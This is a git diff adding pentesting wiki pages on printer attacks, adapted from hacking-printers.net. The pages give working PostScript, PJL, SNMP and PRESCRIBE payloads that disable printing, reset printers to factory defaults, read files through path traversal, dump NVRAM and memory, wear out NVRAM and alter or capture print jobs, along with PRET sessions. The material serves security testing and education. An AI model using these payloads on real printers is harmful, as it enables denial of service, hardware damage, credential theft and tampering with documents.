+### Redefine showpage
+
+By setting `showpage` – which is used in every document to actually print the page – to do nothing at all, PostScript jobs are processed they won't print anything.
+
+```text
+true 0 startjob
+/showpage {} def
+```
+
+Using [PRET](https://github.com/RUB-NDS/PRET):
+
+```text
+./pret.py -q printer ps
+Connection to printer established
+
+Welcome to the pret shell. Type help or ? to list commands.
+printer:/> disable
+Disabling printing functionality
+```
+
+Both attacks code can also be written into Sys/Start, startup.ps or similar files to cause **permanent DoS** on devices with a writable disk.
+
+## PJL
+
+### PJL jobmedia
+
+Proprietary PJL commands can be used to set the older HP devices like the LaserJet 4k series into service mode and completely disable all printing functionality as shown below:
+
+```text
+@PJL SET SERVICEMODE=HPBOISEID
+@PJL DEFAULT JOBMEDIA=OFF
+```
+
+Using [PRET](https://github.com/RUB-NDS/PRET):
+
+```text
+./pret.py -q printer pjl
+Connection to printer established
+
+Welcome to the pret shell. Type help or ? to list commands.
+printer:/> disable
+Printing functionality: OFF
+```
+
+### Offline mode
+
+In addition, the PJL standard defines the `OPMSG` command which ‘prompts the printer to display a specified message and go offline’ \cite{hp1997pjl}. This can be used to simulate a paper jam as shown in below:
+
+```text
+@PJL OPMSG DISPLAY="PAPER JAM IN ALL DOORS"
+```
+
+Using [PRET](https://github.com/RUB-NDS/PRET):
+
+```text
+./pret.py -q printer pjl
+Connection to printer established
+
+Welcome to the pret shell. Type help or ? to list commands.
+printer:/> offline "MESSAGE TO DSIPLAY"
+Warning: Taking the printer offline will prevent yourself and others
+from printing or re-connecting to the device. Press CTRL+C to abort.
+Taking printer offline in... 10 9 8 7 6 5 4 3 2 1 KABOOM!
+```
+
+**Learn more about these attacks in** [**http://hacking-printers.net/wiki/index.php/Document\_processing**](http://hacking-printers.net/wiki/index.php/Document_processing)\*\*\*\*
+
diff --git a/pentesting/pentesting-printers/factory-defaults.md b/pentesting/pentesting-printers/factory-defaults.md
new file mode 100644
index 00000000..19f96394
--- /dev/null
+++ b/pentesting/pentesting-printers/factory-defaults.md
@@ -0,0 +1,78 @@
+---
+description: 'From http://hacking-printers.net/wiki/index.php/Factory_defaults'
+---
+
+# Factory Defaults
+
+**Resetting** a device to factory defaults is a security-critical functionality as it **overwrites protection mechanisms** like user-set passwords. This can usually be done by pressing a **special key combination** on the printer's **control panel**. Performing such a cold reset only takes seconds and therefore is a realistic scenario for local attackers or penetration testers, who can for example sneak into the copy room at lunchtime. However, **physical access** to the device is **not always an option**.
+
+#### SNMP
+
+The Printer-MIB defines the **prtGeneralReset** Object \(**OID 1.3.6.1.2.1.43.5.1.1.3.1**\) which allows an attacker to restart the device \(powerCycleReset\(4\)\), reset the NVRAM settings \(resetToNVRAM\(5\)\) or restore factory defaults \(resetToFactoryDefaults\(6\)\) using SNMP. This feature/attack is **supported by a large variety of printers** and removes all protection mechanisms like user-set passwords for the embedded web server. While protection mechanisms can be efficiently bypassed, a practical drawback of this approach is that all **static IP address configuration will be lost**. **If no DHCP** service is available, the attacker will **not** be able to **reconnect** to the device anymore after resetting it to factory defaults.
+
+**Resetting the device to factory default** can be accomplished using `snmpset` command as shown below \(you need to know the **community string**, by default in most cases is `public`\):
+
+```bash
+snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6
+```
+
+#### [PML](./#pml)/[PJL](./#pjl)
+
+In many scenarios an attacker does not have the capabilities to perform SNMP requests because of firewalls or unknown SNMP community strings. On **HP devices** however, **SNMP** can be transformed into its **PML representation** and embed the request within a legitimate print job. This allows an attacker to **restart and/or reset the device** to factory defaults within ordinary print jobs as shown below:
+
+```bash
+@PJL DMCMD ASCIIHEX="040006020501010301040106"
+```
+
+Anyone can reproduce this attack on HP printers, restarting or resetting the device can easily be reproduced using [**PRET**](https://github.com/RUB-NDS/PRET):
+
+```bash
+./pret.py -q printer pjl
+Connection to printer established
+
+Welcome to the pret shell. Type help or ? to list commands.
+printer:/> reset
+printer:/> restart
+```
+
+#### PostScript
+
+PostScript offers a similar feature: The **FactoryDefaults** system parameter, ‘a flag that, if **set to true** **immediately before** the **printer is turned off**, causes all nonvolatile parameters to revert to their **factory default** values at the next power-on’. It must be noted that **PostScript** itself also has the capability to **restart** its **environment** but it requires a **valid password**.   
+The PostScript interpreter however can be put into an **infinite loop** as discussed in [document processing](http://hacking-printers.net/wiki/index.php/Document_processing) DoS attacks which forces the user to **manually restart** the device and thus reset the PostScript password.
+
+Reset PostScript system parameters to factory defaults:
+
+```bash
+<< /FactoryDefaults true >> setsystemparams
+```
+
+Restart the PostScript interpreter and virtual memory:
+
+```bash
+true 0 startjob systemdict /quit get exec
+```
+
+Anyone can restart or reset a printer's PostScript interpreter can **easily be reproduced using** [**PRET**](https://github.com/RUB-NDS/PRET):
+
+```bash
+./pret.py -q printer ps
+Connection to printer established
+
+Welcome to the pret shell. Type help or ? to list commands.
+printer:/> reset
+printer:/> restart
+```
+
+#### PRESCRIBE
+
+For **Kyocera devices**, the **PRESCRIBE page** description languages may be used to **reset the device** to factory default from within ordinary print jobs using one of the commands shown below:
+
+```bash
+!R! KSUS "AUIO", "CUSTOM:Admin Password = 'admin00'";  CMMT "Drop the security level, reset password";
+!R! ACNT "REST";                                       CMMT "Reset account code admin password";
+!R! EGRE;                                              CMMT "Reset the engine board to factory defaults";
+!R! SIOP0,"RESET:0";                                   CMMT "Reset configuration settings";
+```
+
+To reproduce this attack open a raw network connection to port 9100/tcp of the printer and **send the commands documented above**.
+
diff --git a/pentesting/pentesting-printers/file-system-access.md b/pentesting/pentesting-printers/file-system-access.md
new file mode 100644
index 00000000..0e1ecf55
--- /dev/null
+++ b/pentesting/pentesting-printers/file-system-access.md
@@ -0,0 +1,88 @@
+# File system access
+
+### **PostScript**
+
+Retrieve sensitive information like configuration files or stored print jobs, RCE by writting files \(like editing rc scripts or replacing binary files\).  Legitimate language constructs are defined for **PostScript** and **PJL** to **access the filesystem**.
+
+Access the file system with PostScript \(note that it could be sandboxed limiting to harmless actions\):
+
+```bash
+> /str 256 string def (%*%../*)                               % list all files
+> {==} str filenameforall
+< (%disk0%../webServer/home/device.html)
+< (%disk0%../webServer/.java.login.config)
+< (%disk0%../webServer/config/soe.xml)
+
+> /byte (0) def                                                % read from file
+> /infile (../../../etc/passwd) (r) file def
+> { infile read {byte exch 0 exch put
+>   (%stdout) (w) file byte writestring}
+>   {infile closefile exit} ifelse
+> } loop
+< root::0:0::/:/bin/dlsh
+
+> /outfile (test.txt) (w+) file def}}                         % write to file
+> outfile (Hello World!) writestring
+> outfile closefile
+```
+
+You can use [PRET ](https://github.com/RUB-NDS/PRET)commands:  `ls`, `get`, `put`, `append`, `delete`, `rename`, `find`, `mirror`, `touch`, `mkdir`, `cd`, `pwd`, `chvol`, `traversal`, `format`, `fuzz` and `df` :
+
+```text
+./pret.py -q printer ps
+Connection to printer established
+
+Welcome to the pret shell. Type help or ? to list commands.
+printer:/> ls ../..
+d        -   Jan  1  1970 (created Jan  1  1970)  bootdev
+d        -   Jan  1  1970 (created Jan  1  1970)  dsk_jdi
+d        -   Jan  1  1970 (created Jan  1  1970)  dsk_jdi_ss
+d        -   Jan  1  1970 (created Jan  1  1970)  dsk_ram0
+d        -   Jan  1  1970 (created Jan  1  1970)  etc
+d        -   Jan  1  1970 (created Jan  1  1970)  tmp
+d        -   Jan  1  1970 (created Jan  1  1970)  webServer
+```
+
+### PJL
+
+```text
+> @PJL FSDIRLIST NAME="0:\" ENTRY=1 COUNT=65535               (list all files)
+< .\:\:TYPE=DIR
+< ..\:\:TYPE=DIR
+< PostScript TYPE=DIR
+< PJL TYPE=DIR
+< saveDevice TYPE=DIR
+< webServer TYPE=DIR
+
+> @PJL FSQUERY NAME="0:\..\..\etc\passwd"                     (read from file)
+< @PJL FSQUERY NAME="0:\..\..\etc\passwd" TYPE=FILE SIZE=23
+> @PJL FSUPLOAD NAME="0:\..\..\etc\passwd" OFFSET=0 SIZE=23
+< root::0:0::/:/bin/dlsh
+
+> @PJL FSDOWNLOAD SIZE=13 NAME="0:\test.txt"                  (write to file)
+> Hello World!
+```
+
+Anyway accessing files with PJL is not supported by many printers.
+
+You can use [PRET ](https://github.com/RUB-NDS/PRET)commands:  `ls`, `get`, `put`, `append`, `delete`, `find`, `mirror`, `touch`, `mkdir`, `cd`, `pwd`, `chvol`, `traversal`, `format`, `fuzz` and `df` :
+
+```text
+./pret.py -q printer pjl
+Connection to printer established
+
+Welcome to the pret shell. Type help or ? to list commands.
+printer:/> ls ..
+d        -   bootdev
+d        -   dsk_jdi
+d        -   dsk_jdi_ss
+d        -   dsk_ram0
+d        -   etc
+d        -   lrt
+d        -   tmp
+d        -   webServer
+d        -   xps
+```
+
+**Learn more about possible sandbox bypasses using PostScript and PJL limitations in** [**http://hacking-printers.net/wiki/index.php/File\_system\_access**](http://hacking-printers.net/wiki/index.php/File_system_access)\*\*\*\*
+
diff --git a/pentesting/pentesting-printers/firmware-updates.md b/pentesting/pentesting-printers/firmware-updates.md
new file mode 100644
index 00000000..422c5787
--- /dev/null
+++ b/pentesting/pentesting-printers/firmware-updates.md
@@ -0,0 +1,113 @@
+---
+description: 'Info from http://hacking-printers.net/wiki/index.php/Firmware_updates'
+---
+
+# Firmware updates
+
+ The dangers of malicious firmware updates are well-known and have been discussed early by [\[1\]](http://hacking-printers.net/wiki/index.php/Firmware_updates#cite_note-1) and [\[2\]](http://hacking-printers.net/wiki/index.php/Firmware_updates#cite_note-2). In contrast to other networked devices however, **it is common for printers to deploy firmware updates as ordinary print jobs**. This opens up a wide gateway for attackers because access to printing functionality is usually a low hurdle. One can only speculate about the motivation for such insecure design decisions but it seems logical that historic reasons play a role: Printers used to be connected by parallel or USB cable. Without network connectivity, security was less important and without a password-protected web server or similar functionality the printing channel was the only way to send data to the device.
+
+Firmware modification attacks against network printers have been demonstrated by [\[3\]](http://hacking-printers.net/wiki/index.php/Firmware_updates#cite_note-cui2011print-3) for HP devices, by [\[4\]](http://hacking-printers.net/wiki/index.php/Firmware_updates#cite_note-jordon2014wrestling-4) for the Canon PIXMA series and by [\[5\]](http://hacking-printers.net/wiki/index.php/Firmware_updates#cite_note-heiland2011patched-5) and [\[6\]](http://hacking-printers.net/wiki/index.php/Firmware_updates#cite_note-weidenbach2016pwn-6) for various Xerox models. As a countermeasure, printer manufacturer started to digitally sign their firmware [\[7\]](http://hacking-printers.net/wiki/index.php/Firmware_updates#cite_note-hp2012rfu-7).
+
+### Vendors
+
+To give an overview of firmware deployment procedures 1,400 firmware files for the top 10 printer manufacturers have been downloaded and systematically categorized by [\[8\]](http://hacking-printers.net/wiki/index.php/Firmware_updates#cite_note-8). The results are as follows.
+
+#### HP
+
+Firmware can be downloaded from [support.hp.com](http://support.hp.com/) or directly from [ftp.hp.com](ftp://ftp.hp.com/pub/networking/software/pfirmware/) via FTP. 419 files in HP's traditional remote firmware update \(`.rfu`\) format and 206 newer ‘HP FutureSmart’ binaries \(`.bdl`\) can be retrieved. The `.rfu` files contain proprietary PJL commands like `@PJL UPGRADE SIZE=…`, indicating that firmware updates are deployed as normal print jobs. This has been demonstrated by [\[3\]](http://hacking-printers.net/wiki/index.php/Firmware_updates#cite_note-cui2011print-3) and caused HP to digitally sign all their printer firmware since March 2012 [\[7\]](http://hacking-printers.net/wiki/index.php/Firmware_updates#cite_note-hp2012rfu-7).
+
+#### Canon
+
+Firmware is available at [www.canon.com/support](http://www.canon.com/support/). Canon however requires a valid device serial number to download any firmware. According to [\[4\]](http://hacking-printers.net/wiki/index.php/Firmware_updates#cite_note-jordon2014wrestling-4), who were able to modify firmware for the Canon PIXMA series, ‘there is no signing \(the correct way to do it\) but it does have very weak encryption’. According to email correspondence with a Canon technical support representative, ‘firmware does have to be digitally signed by Canon in order for it to be accepted by the printer’.
+
+#### Epson
+
+Firmware can be downloaded from [epson.com](http://epson.com/) and via FTP from [download.epson-europe.com](ftp://download.epson-europe.com/). Files come as WinZip self-extracting `.exe` files and can be unpacked using unp[\[9\]](http://hacking-printers.net/wiki/index.php/Firmware_updates#cite_note-9). The contained `.efu` files can be analyzed using Binwalk[\[10\]](http://hacking-printers.net/wiki/index.php/Firmware_updates#cite_note-10) which extracts the actual firmware. One can obtain 49 `.rcx` files of unknown format \(‘SEIKO EPSON EpsonNet Form’\) and nine `.prn` files containing PJL commands \(`@PJL ENTER LANGUAGE=DOWNLOAD`\). Epson has not published any information on protection mechanisms. Firmware released before 2016 did not apply code signing and could be manipulated as shown by [\[11\]](http://hacking-printers.net/wiki/index.php/Firmware_updates#cite_note-11). They ‘believe huge amounts of the devices produced since 1999 \[…\] could be vulnerable’.
+
+#### Dell
+
+Firmware can be obtained from [downloads.dell.com](http://downloads.dell.com/) and from [ftp.us.dell.com/printer](ftp://ftp.us.dell.com/printer). Files can be unpacked using unp and the included `.zip` files can be extracted with a variant of unzip. Dell does not produce any printing devices, but rebadges the products of other vendors. Therefore a wide variety of firmware files, including 18 `.hd` files containing `@PJL FIRMWARE=…`, 25 `.prn` files containing `@PJL ENTER LANGUAGE=DOWNLOAD` and 30 `.fls`/`.fly` files containing `@PJL LPROGRAMRIP` were found. Regarding protection mechanisms, Dell has not released any publicly available information.
+
+#### Brother
+
+Firmware cannot be easily downloaded. Instead a Windows binary needs to be run which checks for available printers and requests download links for the latest firmware from a web service. By guessing correct parameters one is able to get the links for 98 files. Firmware files do not need to be unpacked as they already come in raw format. 79 files have the extension `.djf` and contain `@PJL EXECUTE BRDOWNLOAD`, while 9 `.blf` files contain `@PJL ENTER LANGUAGE=PCL`. Brother has not released any publicly available information on protection mechanisms.
+
+#### Lexmark
+
+Firmware is available from [support.lexmark.com](http://support.lexmark.com/) and can be unpacked using unp. 63 `fls` files could be obtained containing the PJL header `@PJL LPROGRAMRIP` to install the firmware. Lexmark's security whitepaper claims ‘packages must be encrypted with a symmetric encryption algorithm through a key that is known only to Lexmark and is embedded securely in all devices. However, the strongest security measure comes from requiring that all firmware packages must include multiple digital 2048-bit RSA signatures from Lexmark. If these signatures are not valid \[...\] the firmware is discarded’ [\[12\]](http://hacking-printers.net/wiki/index.php/Firmware_updates#cite_note-12).
+
+#### Samsung
+
+Firmware can be downloaded from [www.samsung.com/us/support/download](http://www.samsung.com/us/support/download). Retrieved files either come as zip archives or Windows executables which can be run in wine and further unpacked using unp. This way, 33 `.hd` files starting with `@PJL FIRMWARE` and associated `.prn` files containing `@PJL DEFAULT SWUPGRADE=ON` could be obtained. Samsung has not released any publicly available information on protection mechanisms.
+
+#### Xerox
+
+Firmware is publicly available at [www.support.xerox.com](http://www.support.xerox.com/). Downloaded files come in zip format and can be unpacked using unzip. Firmware files are in different formats: 16 `.hd` files including `@PJL FIRMWARE=…`, 36 PostScript files for older devices and 35 `.dlm` files which is the format used by currently used by Xerox and includes digital signatures. A flaw in the deployment process however was found by [\[5\]](http://hacking-printers.net/wiki/index.php/Firmware_updates#cite_note-heiland2011patched-5) and extended by [\[6\]](http://hacking-printers.net/wiki/index.php/Firmware_updates#cite_note-weidenbach2016pwn-6), leading to remote code execution – the private key and the tool used for code signing was contained in the firmware itself.
+
+#### Ricoh
+
+The ‘Firmware Download Center’ at [support.ricoh.com](https://support.ricoh.com/) is not open to the general public. Fortunately the interweb contains direct links to a couple of driver/firmware download pages so one is able to obtain 31 firmware files using a simple Google search \(`site:support.ricoh.com firmware`\). Files can be unpacked using unp. 14 `.bin` files contain `@PJL RSYSTEMUPDATE SIZE=…` while 15 `.brn` files are associated with a `settings.ini`, including `@PJL FWDOWNLOAD` and `USERID=sysadm, PASSWORD=sysadm`. Ricoh does not provide any up-to-date information on protection mechanisms. In a whitepaper dating back to 2007, Ricoh claims that ‘only service technicians have a password and dedicated account for making firmware updates’ [\[13\]](http://hacking-printers.net/wiki/index.php/Firmware_updates#cite_note-13).
+
+#### Kyocera
+
+Kyocera does not release firmware to end-users. In a publicly available Kyocera dealer forum however, firmware downloads for various models are linked: [ftp.kdaconnect.com](ftp://ftp.kdaconnect.com/). Files can be unpacked using unp and contain mountable cramfs[\[14\]](http://hacking-printers.net/wiki/index.php/Firmware_updates#cite_note-14) and squashfs[\[15\]](http://hacking-printers.net/wiki/index.php/Firmware_updates#cite_note-15) images as well as proprietary binary formats. Firmware is deployed as a print job with `!R! UPGR'SYS';EXIT;` prepended – the upgrade command of the PRESCRIBE page description language [\[16\]](http://hacking-printers.net/wiki/index.php/Firmware_updates#cite_note-16). Kyocera has not released any publicly available information on protection mechanisms.
+
+#### Konica
+
+Although not actively promoted, firmware for Konica Minolta printers can be downloaded from [download6.konicaminolta.eu](http://download6.konicaminolta.eu/). Newer Internet-connected devices have the capability to perform firmware updates themselves. Compressed files come in different formats and can be unpacked using unp, unzip and tar which results in 38 proprietary `.bin` files, 20 PostScript based ‘softload printer modules’ for older devices and 14 files of different extensions containing PJL commands like `@PJL ENTER LANGUAGE=FIRMUPDATE`. The Konica Minolta security whitepaper claims that firmware is verified using a ‘hash value’ [\[17\]](http://hacking-printers.net/wiki/index.php/Firmware_updates#cite_note-17). It may be doubted that such a scheme is cryptographically secure.
+
+### Results
+
+Out of ten analyzed manufacturers, nine use [PJL](http://hacking-printers.net/wiki/index.php/PJL) commands for all or at least some of their firmware update procedures which is a strong indicator that updates are deployed as ordinary print jobs. The remaining manufacturer – Kyocera – applies the PRESCRIBE page description language. One can therefore claim that it is common in the printing industry to install new firmware over the printing channel itself and name a **major design flaw** present in almost any printer device: **data and code over the same channel**. Exploitation of this issue however is hard as for most manufacturers no reasoned statement on protection mechanisms can be made. An in-depth analysis of firmware modification attacks should therefore be part of future research. A summary of file headers or types for all obtained firmware files is given below:
+
+| Vendor | Extension | Quantity | File header or type |
+| :--- | :--- | :--- | :--- |
+| HP | rfu | 419 | @PJL UPGRADE SIZE=… |
+| bdl | 206 | FutureSmart binary format |  |
+| Epson | rcx | 49 | SEIKO EPSON EpsonNet Form |
+| prn | 9 | @PJL ENTER LANGUAGE=DOWNLOAD |  |
+| brn | 7 | Unknown binary, includes config file |  |
+| Dell | fls, fly | 30 | @PJL LPROGRAMRIP |
+| prn | 25 | @PJL ENTER LANGUAGE=DOWNLOAD |  |
+| hd | 18 | @PJL FIRMWARE=… |  |
+| brn | 3 | Unknown binary, includes config file |  |
+| ps | 2 | PostScript \(title: Firmware Update\) |  |
+| pjl | 1 | @PJL ENTER LANGUAGE=FLASH |  |
+| Brother | djf | 79 | @PJL EXECUTE BRDOWNLOAD |
+| blf | 9 | @PJL ENTER LANGUAGE=PCL |  |
+| Lexmark | fls | 63 | @PJL LPROGRAMRIP |
+| bin, fls | 6 | Unknown binary format |  |
+| Samsung | hd | 33 | @PJL FIRMWARE=… |
+| fls, hd0 | 4 | @PJL DEFAULT P1284VALUE=… |  |
+| Xerox | ps | 36 | PostScript \(title: Firmware Update\) |
+| dlm | 35 | Xerox Dynamic Loadable Module |  |
+| prn, bin | 20 | @PJL ENTER LANGUAGE=DOWNLOAD |  |
+| hd | 16 | @PJL FIRMWARE=… |  |
+| brn | 10 | Unknown binary, includes config file |  |
+| bin | 10 | @PJL SET JOBATTR="@SWDL" |  |
+| fls, hd, hde | 8 | @PJL DEFAULT P1284VALUE=… |  |
+| fls, xfc | 4 | @PJL ENTER LANGUAGE=XFLASH |  |
+| pjl | 3 | @PJL FSDOWNLOAD \[name\].rpm |  |
+| axf | 3 | RISC OS AIF executable |  |
+| Ricoh | brn | 15 | @PJL FWDOWNLOAD… |
+| bin | 14 | @PJL RSYSTEMUPDATE SIZE=… |  |
+| fls | 4 | @PJL LPROGRAMRIP |  |
+| Kyocera | cramfs, img | 98 | cramfs image |
+| bin, squashfs | 79 | squashfs image |  |
+| bin, kmmfp | 41 | u-boot legacy uImage |  |
+| efi, kmpanel | 13 | proprietary image format |  |
+| Konica Minolta | bin | 38 | unknown binary, additional checksum file |
+| ps | 20 | PostScript \(title: Softload printer modules\) |  |
+| ftp, prn | 11 | @PJL ENTER LANGUAGE=FIRMUPDATE |  |
+| upg | 1 | @PJL ENTER LANGUAGE=UPGRADE |  |
+
+**How to test for this attack?**
+
+The security of code signing is based on keeping the private key a long-term trade secret. There are however still printers in the wild which are potentially vulnerable to malicious firmware – either because they have not yet been updated or because proprietary checksum algorithms are sold as cryptographically secure digital signature schemes. It certainly must be pointed out that analyzing firmware can be hard if vendors do not document their firmware formats and update routines. Usually this requires some reverse engineering. Testing the feasibility of firmware modification attacks therefore is not trivial. In a simple test, one can **flip a single bit** and check if the modified firmware is still accepted by the printer device. If not, either a checksum or a digital signature is verfied by the printer. Finding the difference is not always easy and writing malicious firmware \(with a correct checksum\) can be a time-consuming project.
+
+Other attack scenarios include:
+
+* Even if the firmware is signed, one may be able to downgrade to a certain \(signed\) firmware version which has known security weaknesses.
+* Even if the firmware is signed, it can sometimes be mounted to gain further information \(especially Konica Minolta firmware is easly mountable\).
+* Just because firmware is signed doesn't mean its secure. Using binwalk/grep etc. one may find components with known vulnerabilities like [CVE-2015-7547](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547).
+
diff --git a/pentesting/pentesting-printers/memory-access.md b/pentesting/pentesting-printers/memory-access.md
new file mode 100644
index 00000000..4c1aa72a
--- /dev/null
+++ b/pentesting/pentesting-printers/memory-access.md
@@ -0,0 +1,38 @@
+# Memory Access
+
+**You can try to dump the NVRAM and extract confidential info \(as passwords\) from there.**
+
+In **PJL \(Brother\)** you can access **arbitrary NVRAM addresses** using PJL as shown below:
+
+```bash
+@PJL RNVRAM ADDRESS = X              # read byte at location X
+@PJL WNVRAM ADDRESS = X DATA = Y     # write byte Y to location X
+```
+
+You can test this attack using [**PRET**](https://github.com/RUB-NDS/PRET):
+
+```bash
+./pret.py -q printer pjl
+Connection to printer established
+
+Welcome to the pret shell. Type help or ? to list commands.
+printer:/> nvram dump
+Writing copy to nvram/printer
+................................................................................
+................................................................................
+............................................MyS3cretPassw0rd....................
+................................................................................
+```
+
+Certain **Xerox printer models** have a proprietary **PostScript** `vxmemfetch` operator built into, which allows an attacker to read arbitrary memory addresses. Using a PostScript loop, this feature can be easily used to dump the whole memory as show below \(PRET doesn't have this attack so you will need to send this payload to the port 9100 in a `nc` connection\):
+
+```text
+/counter 0 def 50000 {
+  /counter counter 1 add def
+  currentdict /RRCustomProcs /ProcSet findresource begin
+  begin counter 1 false vxmemfetch end end == counter
+} repeat
+```
+
+**More information here:** [**http://hacking-printers.net/wiki/index.php/Memory\_access**](http://hacking-printers.net/wiki/index.php/Memory_access)\*\*\*\*
+
diff --git a/pentesting/pentesting-printers/physical-damage.md b/pentesting/pentesting-printers/physical-damage.md
new file mode 100644
index 00000000..31a5dc18
--- /dev/null
+++ b/pentesting/pentesting-printers/physical-damage.md
@@ -0,0 +1,46 @@
+# Physical Damage
+
+ Long-term settings for printers and other embedded devices are stored in non-volatile memory \([NVRAM](https://en.wikipedia.org/wiki/Non-volatile_random-access_memory)\) which is traditionally implemented either as [EEPROM](https://en.wikipedia.org/wiki/EEPROM) or as [flash memory](https://en.wikipedia.org/wiki/Flash_memory). Both components have a limited lifetime. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur.
+
+### PJL
+
+For a practical test to destroy NVRAM write functionality one can continuously set the long-term value for the number of copies with different values for `X`:
+
+```text
+@PJL DEFAULT COPIES=X
+```
+
+Usually, before stop allowing writing anymore NVRAM parameters are fixed to the factory default value and all variables could still be changed for the current print job using the `@PJL SET...` command.
+
+Using [PRET](https://github.com/RUB-NDS/PRET):
+
+```text
+./pret.py -q printer pjl
+Connection to printer established
+
+Welcome to the pret shell. Type help or ? to list commands.
+printer:/> destroy
+Warning: This command tries to cause physical damage to the
+printer NVRAM. Use at your own risk. Press CTRL+C to abort.
+Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM!
+Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave?
+[... wait for about 24 hours ...]
+I'm afraid. I'm afraid, Dave. Dave, my mind is going...
+NVRAM died after 543894 cycles, 18:46:11
+```
+
+### PostScript
+
+For PostScript, one needs to find an entry in the currentsystemparams dictionary which survives a reboot \(and therefore must be stored in some kind of NVRAM\). A good candidate would be a PostScript password.  
+PostScript can run a script that corrupts its own NVRAM:
+
+```text
+/counter 0 def
+{ << /Password counter 16 string cvs
+     /SystemParamsPassword counter 1 add 16 string cvs
+  >> setsystemparams /counter counter 1 add def
+} loop
+```
+
+**More information about these techniques can be found in** [**http://hacking-printers.net/wiki/index.php/Physical\_damage**](http://hacking-printers.net/wiki/index.php/Physical_damage)\*\*\*\*
+
diff --git a/pentesting/pentesting-printers/print-job-manipulation.md b/pentesting/pentesting-printers/print-job-manipulation.md
new file mode 100644
index 00000000..142586dd
--- /dev/null
+++ b/pentesting/pentesting-printers/print-job-manipulation.md
@@ -0,0 +1,50 @@
+---
+description: 'From http://hacking-printers.net/wiki/index.php/Print_job_manipulation'
+---
+
+# Print job manipulation
+
+## Content Overlay
+
+One simple way to manipulate the appearance of printouts is to **use** overlays.   
+[**PCL**](./#pcl) has a documented function to put **overlay macros** on top of a document. Unfortunately, this feature is **limited to the current print job** and cannot be made permanent.   
+[**PostScript** ](./#postscript-ps)does not offer such functionality by default, however it can be programmed into by **redefining the showpage** operator which is contained in every PostScript document to print the current page. The attacker can **hook in there**, execute her own code and then call the original version of the operator.  
+Therefore she can overlay all pages to be printed with a custom EPS file. This hack can be used to **add arbitrary graphics or fonts to hard copies of a document** \(It is possible to completely alter the appearance of a document by overlaying a blank page and then adding custom content\).  
+Obviously, such an approach can only be successful if PostScript is used as printer driver and no `StartJobPassword` is set.
+
+![](http://hacking-printers.net/wiki/images/thumb/9/93/Overlay.jpg/300px-Overlay.jpg)
+
+**How to test for this attack?**
+
+Use [**PRET**](https://github.com/RUB-NDS/PRET)'s `cross` or `overlay` commands in ps mode, then disconnect and print an arbitrary document:
+
+```text
+./pret.py -q printer ps
+Connection to printer established
+
+Welcome to the pret shell. Type help or ? to list commands.
+printer:/> overlay overlays/smiley.eps
+printer:/> cross whoa "HACKED"
+printer:/> exit
+```
+
+## Content Replacement
+
+Even if an attacker can put an overlay above existing documents, she will not be able to **alter specific values** in the original document unless its exact structure is known. Sometimes ones does not only want to add custom content, but to **parse and replace parts** of the existing document.   
+The problem of replacing text in PostScript files can be reduced to the **problem of extracting strings** from the rendered document. This is not trivial, because strings can be dynamically built by the PostScript program itself. Hence, simple parsing and replacing within the document source code is not an option.  
+You can use  a **redefined `show` operator**. The show operator accepts a string as input, which is painted to a certain location of the current page. By redefining the operator, **text** can elegantly be **extracted**. This approach can also be used for targeted **searching and replacing** in strings immediately **before** they are **painted**.   
+The approach is **successful** for **LaTeX** based PostScript documents which are directly sent to the printer while it **fails** for PostScript files generated by **GIMP** which instead of strings **creates raster graphics** of their representation. The same issue occurs for any document format – even PostScript itself – when processed by CUPS. Theoretically such language constructs could also be parsed and should be subject of further research.
+
+**How to test for this attack?**
+
+Use [**PRET**](https://github.com/RUB-NDS/PRET)'s `replace` command in ps mode, then disconnect and print a PostScript document containing ‘DEF’:
+
+```text
+./pret.py -q printer ps
+Connection to printer established
+
+Welcome to the pret shell. Type help or ? to list commands.
+printer:/> replace "ABC" "DEF"
+printer:/> exit
+```
+
diff --git a/pentesting/pentesting-printers/print-job-retention.md b/pentesting/pentesting-printers/print-job-retention.md
new file mode 100644
index 00000000..9ba8d79b
--- /dev/null
+++ b/pentesting/pentesting-printers/print-job-retention.md
@@ -0,0 +1,114 @@
+---
+description: 'From http://hacking-printers.net/wiki/index.php/Print_job_retention'
+---
+
+# Print Job Retention
+
+## Job Retention
+
+Some printers have stored print jobs accessible from the web server. Usually however, job retention must be explicitly activated for a certain print job and can be done using standard PJL commands or proprietary PostScript code. Jobs are then kept in memory and can be reprinted from the control panel.
+
+### PJL
+
+Legitimate job retention can be enabled for the current document by setting the PJL HOLD variable as shown below:
+
+```text
+@PJL SET HOLD=ON
+[actual data to be printed follows]
+```
+
+Hold jobs are kept in memory and can be reprinted from the printer's control panel. This feature is supported by various printers, however as it seems only some Epson devices allow permanent job retention beeing set using `@PJL DEFAULT HOLD=ON`.
+
+**How to test for this attack?**
+
+Use `hold`command from [**PRET** ](https://github.com/RUB-NDS/PRET)in pjl mode and to check if permanent job retention can be set:
+
+```text
+./pret.py -q printer pjl
+Connection to printer established
+
+Welcome to the pret shell. Type help or ? to list commands.
+printer:/> hold
+Setting job retention, reconnecting to see if still enabled
+Retention for future print jobs: OFF
+```
+
+### PostScript
+
+PostScript offers similar functionality which however is model- and vendor-specific. For the HP LaserJet 4k series and various Kyocera printers, job retention can be enabled by prepending the following commands to a PostScript document:
+
+```text
+<< /Collate true /CollateDetails
+<< /Hold 1 /Type 8 >> >> setpagedevice
+```
+
+While it is theoretically possible to permanently enable PostScript job retention using the [startjob ](./#postscript-ps)operator, this setting is explicitly reset by CUPS at the beginning of each print job using `<< /Collate false >> setpagedevice`. To counter this protection mechanism however, the attacker can permanently redefine the `setpagedevice` operator to have no effect at all.
+
+**How to test for this attack?**
+
+Use `hold`command from [**PRET** ](https://github.com/RUB-NDS/PRET) in ps mode:
+
+```text
+./pret.py -q printer ps
+Connection to printer established
+
+Welcome to the pret shell. Type help or ? to list commands.
+printer:/> hold
+Job retention enabled.
+```
+
+## Job Capture
+
+It is possible but uncommon to activate job retention in the printing dialog as discussed above. With PostScript however, one has complete access over the current print job and with the [startjob](./#postscript-ps) operator, it is even possible to break out of the server loop and access future jobs. Such functionality has the potential to capture all documents if PostScript is used as a printer driver.
+
+### PostScript
+
